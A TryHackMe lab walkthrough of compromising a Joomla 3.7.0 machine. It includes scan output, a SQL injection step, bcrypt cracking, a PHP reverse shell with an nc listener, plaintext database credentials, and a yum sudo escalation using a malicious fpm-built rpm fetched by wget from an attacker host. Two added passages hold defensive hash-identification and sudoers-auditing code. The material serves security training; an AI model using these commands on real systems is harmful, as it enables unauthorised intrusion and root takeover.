Categories: walkthrough
Tags: tryhackme, thm, joomla, joomscan, sqli, CVE-2017-8917, hash-identifier, john-the-ripper, Linux-Machine, PrivEsc-Linux, PrivEsc, PrivEsc-sudo-l, yum, sudo-l
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:52 IST
Initiating Ping Scan at 20:52
Scanning 10.10.231.212 [2 ports]
Completed Ping Scan at 20:52, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:52
Completed Parallel DNS resolution of 1 host. at 20:52, 0.06s elapsed
DNS resolution of 1 IPs took 0.06s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 20:52
Scanning 10.10.231.212 [3 ports]
Discovered open port 80/tcp on 10.10.231.212
Discovered open port 22/tcp on 10.10.231.212
Discovered open port 3306/tcp on 10.10.231.212
Completed Connect Scan at 20:52, 0.37s elapsed (3 total ports)
Nmap scan report for 10.10.231.212
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-04 20:52:41 IST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
3306/tcp open mysql syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds
$ nmap -sV -sC -p22,80,3306 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:56 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds
Username Enumeration - CVE-2018-15473
Input Forms
Neither form is vulnerable to SQLi.
From the service scan, we learned that the server is running Joomla CMS:
http-generator: Joomla! - Open Source Content Management
Let's check robots.txt for the disallowed entries:
http-robots.txt: 15 disallowed entries
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
By navigating to all the entries in robots.txt, we find that only the /administrator/ directory is accessible; it is the Joomla login page.
Let's run joomscan to get more information:
$ joomscan -u http://10.10.231.212
joomscan reports the Joomla version as 3.7.0.
Let's check for public exploits.
Joomla 3.7.0 is vulnerable to SQL injection (CVE-2017-8917).
Exploit code:
By exploiting it, we obtain a username and password hash:
Extracting users from fb9j5_users
Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
Let's identify the hash. hash-identifier did not recognise the hash type. Comparing it with the hashcat example hashes, we see that it is a bcrypt hash.
Let's crack the hash:
$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
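hash-identifier fails here because it matches on digest length and character set, which only works for raw unsalted digests; bcrypt and the other modular-crypt-format hashes carry a self-describing `$id$` prefix that is the authoritative way to identify them. The added example below (my own code, not from the original write-up) parses that prefix and, for bcrypt, splits out the variant, cost factor, salt and digest. The cost of 10 in the hash found above corresponds to 2^10 = 1024 iterations, which is exactly the "Cost 1 (iteration count) is 1024" line john prints.

```python
import re

# Modular-crypt-format prefixes and the scheme each denotes (table constructed
# for this example; covers the formats commonly found in CMS and Unix stores).
MCF_PREFIXES = {
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2x$": "bcrypt", "$2y$": "bcrypt",
    "$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
    "$argon2id$": "argon2id", "$argon2i$": "argon2i",
    "$P$": "phpass-md5", "$H$": "phpass-md5",
}

# bcrypt: $<variant>$<2-digit cost>$<22-char salt><31-char digest>, base64
# alphabet ./A-Za-z0-9 (bcrypt's own variant, not standard base64).
BCRYPT_RE = re.compile(r"^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{53})$")


def identify_hash(h):
    """Classify a password hash string; returns a dict with at least 'scheme'."""
    h = h.strip()
    m = BCRYPT_RE.match(h)
    if m:
        variant, cost, payload = m.groups()
        cost = int(cost)
        return {
            "scheme": "bcrypt",
            "variant": variant,
            "cost": cost,
            "iterations": 2 ** cost,   # the key-setup loop runs 2^cost times
            "salt": payload[:22],
            "digest": payload[22:],
        }
    for prefix, scheme in MCF_PREFIXES.items():
        if h.startswith(prefix):
            return {"scheme": scheme}
    # No prefix: an unsalted hex digest. Length alone is ambiguous (MD5 and
    # NTLM are both 128 bits), which is all hash-identifier has to go on.
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) % 2 == 0:
        return {"scheme": "raw-hex-digest", "bits": len(h) * 4}
    return {"scheme": "unknown"}


if __name__ == "__main__":
    # Hash recovered from the fb9j5_users table above.
    info = identify_hash("$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm")
    print(f"{info['scheme']} variant={info['variant']} cost={info['cost']} "
          f"iterations={info['iterations']} salt={info['salt']}")
```

The iteration count is what makes bcrypt slow to crack: each doubling of the cost doubles the work per guess, so a site that stays on the Joomla default of 10 while hardware improves gets cheaper to attack every year.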
$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 22:30 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MariaDB (unauthorized)
|_mysql-empty-password: Host 'eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-enum:
| Accounts: No valid accounts found
|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.98 seconds
Nothing much from MariaDB.
Let's log in to Joomla with the credentials obtained during the enumeration phase.
We are greeted with the control panel.
With some search-engine dorking, we learn that access can be obtained by manipulating a template in the Joomla control panel.
Navigate to Extensions > Templates > Templates in the control panel.
We have two templates.
Let's find which template Joomla is using.
Joomla is using the Protostar template.
In the Protostar template, edit index.php to contain the pentest monkey PHP reverse shell, save it, and reload the home page.
We get a shell.
Spawning a TTY:
sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ ^Z
[1] + 5783 suspended nc -nlvp 9898
$ stty raw -echo; fg
[1] + 5783 continued nc -nlvp 9898
bash-4.2$ export TERM=xterm
bash-4.2$
We don't have access to jjameson's home directory to get the user flag.
bash-4.2$ ls -l /home
total 0
drwx------. 2 jjameson jjameson 99 Dec 15 2019 jjameson
This web server is configured with a MariaDB database, and to connect MariaDB to PHP there will be a configuration file in the web directory. Let's check it.
bash-4.2$ cd /var/www/html
bash-4.2$ ls
LICENSE.txt cli includes media tmp
README.txt components index.php modules web.config.txt
administrator configuration.php language plugins
bin htaccess.txt layouts robots.txt
cache images libraries templates
bash-4.2$ cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'The Daily Bugle';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
public $gzip = '0';
[...snip...]
Using the obtained database credentials, let's log in to the DB and look for any juicy details.
bash-4.2$ mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 305
Server version: 5.5.64-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databaes;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'databaes' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| mysql |
| performance_schema |
| test |
+--------------------+
5 rows in set (0.00 sec)
MariaDB [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| fb9j5_assets |
| fb9j5_associations |
| fb9j5_banner_clients |
| fb9j5_banner_tracks |
| fb9j5_banners |
|
[...snip...]
No juicy information obtained.
Let's try the same database password for the users on the target machine.
We get access as jjameson and the user flag.
Let's check for PrivEsc possibilities.
There is a sudo permission for the yum binary.
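A sudo rule that lets an unprivileged user run a package manager as root is equivalent to granting root, because package formats carry pre- and post-install scripts that the package manager executes as the installing user. The added example below (my own code, not from the original write-up) is a small sudoers auditor a defender can run against `/etc/sudoers` and `/etc/sudoers.d/*`: it parses user-specification lines and flags any rule that grants a package manager to a non-root runas target, noting whether NOPASSWD is set. The list of package managers and the sample sudoers text are constructed for this example.

```python
import os
import re

# Package managers whose install path runs arbitrary package scripts as root.
PACKAGE_MANAGERS = {"yum", "dnf", "rpm", "apt", "apt-get", "dpkg", "pip", "pip3", "gem"}

# user  host=(runas) [TAG: ...] cmd[, cmd...]   (aliases and Defaults are skipped)
SUDOERS_RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+?)$"
)

SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Parse sudoers user specifications into dicts; ignores comments/aliases."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas = (m.group("runas") or "root").split(":")[0]  # user part of (user:group)
        rules.append({
            "who": m.group("who"),
            "runas": runas,
            "nopasswd": "NOPASSWD" in tags,
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit(rules):
    """Flag rules granting a package manager with root-equivalent runas."""
    findings = []
    for r in rules:
        if r["runas"] not in ("ALL", "root"):
            continue
        for cmd in r["cmds"]:
            if cmd == "ALL":
                continue  # full sudo is a policy choice, out of scope for this check
            binary = os.path.basename(cmd.split()[0])
            if binary in PACKAGE_MANAGERS:
                findings.append({
                    "who": r["who"], "cmd": cmd, "nopasswd": r["nopasswd"],
                    "reason": f"{binary} runs package install scripts as root",
                })
    return findings


# Constructed sample in the style of a CentOS /etc/sudoers, including a rule
# like the one found on the target.
SAMPLE_SUDOERS = """\
Defaults    requiretty
root      ALL=(ALL)       ALL
%wheel    ALL=(ALL)       ALL
jjameson  ALL=(ALL)       NOPASSWD: /usr/bin/yum   # the finding
ops       ALL=(root)      NOPASSWD: /usr/bin/systemctl restart httpd
"""

if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        flag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"{f['who']}: {f['cmd']} ({flag}) - {f['reason']}")
```

The remediation is to remove the rule rather than narrow it: package managers offer too many paths to script execution for argument restrictions in sudoers to be trustworthy, so routine package updates should be handled by a scheduled job running as root, not delegated to a user account.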
Using information from GTFOBins and the fpm tool to escalate privileges:
$ git clone https://github.com/jordansissel/fpm.git
$ cd fpm
$ sudo gem install fpm
$ sudo apt-get install rpm
$ printf '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod +s /tmp/bash' > root.sh
$ ls
bin CONTRIBUTORS fpm.gemspec Makefile README.rst templates
Brewfile Dockerfile Gemfile misc root.sh test
CHANGELOG.rst docs lib NOTES.md singularity.def Vagrantfile
CODE_OF_CONDUCT.md examples LICENSE notify-failure.sh spec
$ mkdir junk
Here -n is the package name, -s the input type, -t the output package type and -a the architecture.
$ fpm -n tmpbash -s dir -t rpm -a all --before-install ./root.sh ./junk
Created package {:path=>"tmpbash-1.0-1.noarch.rpm"}
$ ls
bin Dockerfile junk NOTES.md spec
Brewfile docs lib notify-failure.sh templates
CHANGELOG.rst examples LICENSE README.rst test
CODE_OF_CONDUCT.md fpm.gemspec Makefile root.sh tmpbash-1.0-1.noarch.rpm
CONTRIBUTORS Gemfile misc singularity.def Vagrantfile
$ python3 -m http.server 8991
Serving HTTP on 0.0.0.0 port 8991 (http://0.0.0.0:8991/) ...
Getting the root flag
wget http://<ip>:8991/tmpbash-1.0-1.noarch.rpm